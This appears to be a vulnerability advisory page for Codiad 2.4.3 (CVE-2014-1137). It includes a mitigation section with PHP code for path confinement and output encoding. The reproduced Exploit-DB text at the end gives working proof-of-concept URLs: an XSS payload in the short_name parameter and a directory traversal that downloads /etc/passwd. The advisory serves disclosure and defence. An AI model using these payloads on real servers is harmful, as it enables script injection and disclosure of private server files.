Vendor: Codiad
By: TaurusOmar
CVSS: 7.5 (HIGH)
Cross Site Scripting & Local File Inclusion
CWE: 79, 22
Product Name: Codiad
Affected Version From: 2.4.3
Affected Version To: 2.4.3
Patch Exists: NO
Related CVE: CVE-2014-1137
CPE: a:codiad:codiad
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Bugtraq Optimus
2014

Codiad 2.4.3 – Cross Site Scripting – Local File Inclusion Vulnerabilities

Codiad is a web-based IDE framework with a small footprint and minimal requirements. An attacker can exploit a Cross Site Scripting vulnerability in the 'dialog.php' script by injecting malicious JavaScript code through the 'short_name' parameter. An attacker can also exploit a Local File Inclusion vulnerability in the 'download.php' script by placing directory traversal sequences in the 'path' parameter to download private files from the server.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in the application.
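
One way to apply this advice to the two parameters named above, as an added example that is not Codiad's own code: the 'path' value is resolved and confined to a workspace root, and the 'short_name' value is HTML-encoded before output. The function names and the workspace layout are assumptions.

```php
<?php
// Added illustration, not Codiad source code. The function names and the
// workspace layout below are assumptions.

// Return the symlink-resolved path only if it is a file inside $root.
function resolve_in_workspace(string $root, string $userPath): ?string
{
    if (strpos($userPath, "\0") !== false) {
        return null; // reject NUL bytes before touching the filesystem
    }
    $rootReal = realpath($root);
    if ($rootReal === false) {
        return null;
    }
    $candidate = realpath($rootReal . DIRECTORY_SEPARATOR . $userPath);
    if ($candidate === false || !is_file($candidate)) {
        return null;
    }
    // Compare against "root/" so that "/srv/ws-old" cannot match "/srv/ws".
    $prefix = rtrim($rootReal, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    return strncmp($candidate, $prefix, strlen($prefix)) === 0 ? $candidate : null;
}

// Encode a value before echoing it into HTML text or a quoted attribute.
function html_escape(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Constructed demo workspace containing a single file.
$root = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'ws_' . bin2hex(random_bytes(4));
mkdir($root . DIRECTORY_SEPARATOR . 'project', 0700, true);
file_put_contents($root . '/project/index.php', "<?php\n");

// A path inside the workspace resolves; a traversal out of it yields NULL.
var_dump(resolve_in_workspace($root, 'project/index.php'));
var_dump(resolve_in_workspace($root, '../../../../etc/passwd'));

// The rename dialog value is encoded, so markup in it stays inert text.
$shortName = '\'"><img src=x onerror=prompt(1);>';
echo '<input name="short_name" value="', html_escape($shortName), '">', "\n";
```

Because the check runs on the resolved path, it also covers symlinks inside the workspace that point outside it.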

Exploit-DB raw data:

               -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
                 INDEPENDENT SECURITY RESEARCHER 
                   PENETRATION TESTING SECURITY
               -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
 

# Exploit Title: Codiad 2.4.3 - Cross Site Scripting - Local File Inclusion Vulnerabilities
# Date: 19/12/2014
# Url Vendor: http://codiad.com/
# Vendor Name: Codiad
# Version: 2.4.3
# CVE:  CVE-2014-1137
# Author: TaurusOmar
# Twitter: @TaurusOmar_
# Email:  taurusomar13@gmail.com
# Home:  overhat.blogspot.com
# Tested On: Bugtraq Optimus
# Risk: High

Description
Codiad is a web-based IDE framework with a small footprint and minimal requirements.
Codiad was built with simplicity in mind, allowing for fast, interactive development without the massive overhead of some of the larger desktop editors. That being said, even users of IDEs such as Eclipse, NetBeans and Aptana are finding Codiad's simplicity to be a huge benefit. While simplicity was key, we didn't skimp on features and have a team of dedicated developers actively adding more.


------------------------
+ CROSS SITE SCRIPTING + 
------------------------
#Exploiting Description - Inject the XSS code in the following path

/components/filemanager/dialog.php?action=rename&path=3&short_name=

#P0c
http://site.com/components/filemanager/dialog.php?action=rename&path=3&short_name='"><img src=x onerror=prompt(1);>

#Proof Concept
http://i.imgur.com/rr9b42K.jpg


------------------------
+ Local File Inclusion +
------------------------
# Exploiting Description - Open the path in your browser and download a private server file, /etc/passwd

#P0c
http://site.com/components/filemanager/download.php?path=../../../../../../../../../../../etc/passwd&type=undefined

#Proof Concept
http://i.imgur.com/LSm360S.jpg